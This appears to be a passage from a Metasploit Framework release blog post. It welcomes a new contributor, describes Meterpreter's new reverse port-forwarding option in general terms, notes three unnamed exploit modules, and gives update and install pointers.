Also, Mubix is a personal friend of mine and I think he's a hoopy frood who really knows where his towel is. I'm excited to see how he'll use his new-found powers.


In fact, he's already landed his first Pull Request, which brings me to...


Portfwd, n.


Some of the most fun you can have with Meterpreter is by sending your evil packets through it. One way to do that is the portfwd command, which allows you to do what it sounds like -- forward connections from one port to another. This works pretty similarly to port forwarding in SSH, except that previously, it was only possible to listen on the attack platform and forward connections to the victim's network. As of this update, you can go the other direction as well. By setting up a reverse forward, you can tell Meterpreter to listen on the victim system and have connections forwarded back to the network where Metasploit is running. For the latest in fun stuff happening in Meterpreter land, I recommend checking out OJ's recent bloggery on the subject.


New Modules


Exploit modules (3 new)


Get it


As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.11.23...4.11.26


To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.
